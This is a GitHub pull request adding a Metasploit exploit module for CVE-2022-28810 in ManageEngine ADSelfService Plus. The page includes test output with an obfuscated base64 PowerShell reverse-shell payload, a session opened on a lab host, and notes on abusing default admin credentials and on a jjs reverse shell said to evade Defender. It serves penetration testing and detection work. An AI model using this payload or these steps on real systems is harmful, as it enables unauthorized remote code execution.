-
Notifications
You must be signed in to change notification settings - Fork 14.3k
ManageEngine ADSelfService Plus Authenticated RCE (CVE-2022-28810) #16475
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Conversation
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Module is working great. The detailed setup steps were super helpful. I just left a few comments based on my review.
Testing Output
msf6 exploit(windows/http/manageengine_adselfservice_plus_cve_2022_28810) >
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. This determination is based on the version string: 6121.
[+] Authentication successful
[*] Requesting policy list from /ServletAPI/configuration/policyConfig/getPolicyConfigDetails
[*] Requesting policy details for msflab.local
[*] Payload: cmd.exe /c powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAMAnX2ICA5VVXW8aORR951dcoelmRgEL0HbVRkq17DRdRcq2qJNtHhBSjOcSZmNs1vYEUMJ/rz3j+SAkausH'+'{1}PteHx+fe2wvcsFMJgX8jaZ/g3P{1}MxQ{1}Oo8dsC3YMDiHz7jpf5n/h8xA/3q3xs90hXbQEJs'+'fF/lVMvlX40dc0JybW{1}FqIxnl2kIERuVYZ02U3O7Isww7'+'3hqpcjv7zqKiu'+'JYbVLZn2UERn1BFV2H5PU2Mys{2}dLIjlakVF2jsc{2}{2}RnUjwb/Cg3gkuaFqORx1SSodbgBVjJNOfoCP4ZRlCmZAsIq2Wgj/9Dd56JtBsVwXJeMZdn2qBAZSdPk539Xh{1}nWiLZPRpNrtn6ymfMfrfteCLRhir'+'j1vUrF1FfovNW3pgxXBsLWJYjLKnsX6Or8A{1}VxmP{1}NXSr5C8xjyd+oe7w/YgM/3hHhm/fk+HoXbfnduKX75QSaqOQrhzfEp5YqyXFmOXZMCwrVBJ0bun6gr{2}oac2{2}CuwVhshylZkdSarU0K/'+'fCxbWVtgLH4'+'Nri76HPtUwPZjzFVfSYIzKZIuMUYPfKM9S6rwXU87nlN3PougFOmScm6Uzrps01q9qE4ic817XcD0cd{2}2hNl4t'+'VLPRtpL{2}+c7gdDYL3L+z5ICQ0cC2pzePg70X{1}0V'+'ahcOpwa0hKJhMnd/PzsZJfHkZuQL85XLC7o01rtxomLijlSyRc1C5EDYbrDy5tubtwi'+'kEKB7OXE+4o39qx2yl6gC{2}q3VumuCtiOV6p7K7pYEwjuCfjCmp5cJALNVaqkJRAmO'+'3mEvSoNBiP2BKbsWt8Lb0cpAbWxsMm431Br2mQ65Q3Jll20fVoW476chIv6bS9HQ{1}VxbSyeIvBFLz/HWu1axPUl1QtrScS1DIRH3hNFkNbdfCg3s6ItVuyyutQoqeLsWD'+'vMf+xXZttdVW7xpl37bUZplxDMMgK1xXbuIr0jQsPdaDQQ+CA/YR9AXC4EjSC6cfptdWy9eeDH9OXQopNL7wmjco9rRRR6WF5q+LYneVqBBk0bNq2sPpinm0b+hXV18JPvrw2'+'xCe4Etu+iUqePMcQI2gEKQCPoW{2}SQIn9r/Q/0qywsMRmVCzdNEPcNKAbB2RAJWSajqYHSzWYl3ECeNIVRi9xOC83bFHbds5NvBP+beB+aFj24Y98ms15xPP9bJ+Df3F4+/2mEuNfj/FcazeqLZhmocrMXJdvVb+1zqzfujr2vkX6zsNqLftrggAAA{0}{0}')-f'=','G','T')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))"
[*] Enabling custom scripts and inserting the payload
[*] Posting updated policy configuration to /ServletAPI/configuration/policyConfig/setAPCDetails
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.159.128:4444
msf6 exploit(windows/http/manageengine_adselfservice_plus_cve_2022_28810) >
msf6 exploit(windows/http/manageengine_adselfservice_plus_cve_2022_28810) > [*] Powershell session session 3 opened (192.168.159.128:4444 -> 192.168.159.87:50092 ) at 2022-04-19 17:21:52 -0400
msf6 exploit(windows/http/manageengine_adselfservice_plus_cve_2022_28810) > sessions -i 3
[*] Starting interaction with 3...
PS C:\ManageEngine\ADSelfService Plus\bin> exit
[*] 192.168.159.87 - Powershell session session 3 closed. Reason: User exit
msf6 exploit(windows/http/manageengine_adselfservice_plus_cve_2022_28810) >
documentation/modules/exploit/windows/http/manageengine_adselfservice_plus_cve_2022_28810.md
Outdated
Show resolved
Hide resolved
modules/exploits/windows/http/manageengine_adselfservice_plus_cve_2022_28810.rb
Outdated
Show resolved
Hide resolved
modules/exploits/windows/http/manageengine_adselfservice_plus_cve_2022_28810.rb
Outdated
Show resolved
Hide resolved
modules/exploits/windows/http/manageengine_adselfservice_plus_cve_2022_28810.rb
Outdated
Show resolved
Hide resolved
modules/exploits/windows/http/manageengine_adselfservice_plus_cve_2022_28810.rb
Outdated
Show resolved
Hide resolved
|
Updated to address all comments. Thanks for that bit of JSON clean-up code, Spencer! That makes this a bit less sketchy 😄 Retested: And manually verified the custom scripts fields were reset. |
|
Yay, a |
|
Thanks for implementing those changes. I just retested the module and confirmed it's still working. Merged! |
Release NotesThis adds an exploit for CVE-2022-28810 which is an authenticated RCE in ManageEngine ADSelfService Plus. |
This is an implementation of an attack Rapid7 observed in the wild against ManageEngine ADSelfService Plus (ADSSP). Attackers were using the ADSSP's "custom script" functionality to execute arbitrary operating system commands whenever domain users reset their passwords. The "custom script" logic can only be accessed by the
adminuser, butadminhas a default password (admin) that isn't getting changed as often as you'd hope.The "custom script" functionality that this module abuses was removed in build 6122 to address CVE-2022-28810. The vendor worded CVE-2022-28810 in such a way that it's unclear if they think the specific behavior this module abuses falls under the umbrella of CVE-2022-28810. But, since my name is associated with the CVE, I'm going to claim some type of authoritative knowledge and say, "Yes, fixing CVE-2022-28810 is in part about preventing arbitrary command execution using custom scripts."
Anyway. There are a few of "interesting" things about this module because isn't there always?
jjs is good
In the wild, the attacker was executing powershell to download stuff and whatever. Which is fine. But I thought this was a good opportunity to use
jjssince ADSSP installs Java in tree and we always know where it is relative to our working directory. This was extra interesting because we didn't have ajjsreverse shell for Windows, and it is actually a good use for this vulnerability.So this pull request also adds a reverse shell for Windows using jjs. It's almost entirely a copy and paste of @bcoles work... to the point I didn't take any credit (there were a few minor tweaks but nothing to get all excited about). I enjoy
jjsbecause the payload will execute "in memory" ish and Defender still seems not to give a hoot about it so you never have to mess around with builtin Windows AV. I actually published my own jjs c2 a number of months before the cited links in thejjs_reverse_tcp.rbbut I'm sure others did too. Either way, jjs is good. I'm very happy to use jjs here.There's always the argument that the module should drop meterpeter but this is likely to be the more successful solution
DisablePayloadHandler
This module sets
DisablePayloadHandlerto true and then starts it's own payload handler (code which was stolen almost wholesale fromwindows/local/persistence.rb). This is a side affect from the module requiring user interaction to execute the payload. The module is set topassiveso it can wait in the background, but it will simply exit after a brief timeout if using the default payload handler. Hence controlling it's own handler is the solution.TARGET_RESET
Exploitation leaves our payload in the custom script form, so I added an option that will simply clean up the target if the user specifies
true. Again, due to the user interaction nature of this attack, there isn't a great time to clean everything up (it's not as simple as deleting a file), so I figured this was a reasonable solution. 🤷Default port
By default this thing installs as HTTP on 8888. It can be configured to use HTTPs (9251 by default). I left the default port as 8888 with SSL set to false, but I think it's more likely that exploitable cases will be using HTTPs. Thoughts? Should I switch it over?
I've attached both video and pcap demonstrating exploitation. The video is worth a watch to understand what is happening, probably. The pcap should be useful for all of our signature writing friends (it's HTTP by default 😱). That's it.
Verification
List the steps needed to make sure this thing works
msfconsoleset RHOST <ip>set LHOST <ip>checkrunset TARGET_RESET truerunscripts have been removed and disabled ("Configuration" -> "Self Service" ->
"Policy Configuration" -> "Advanced" -> "Password Sync")
Video || GTFO
https://www.youtube.com/watch?v=eQxth9FUkJE
PCAP || GTFO
manageengine_adssp_reverse_shell.zip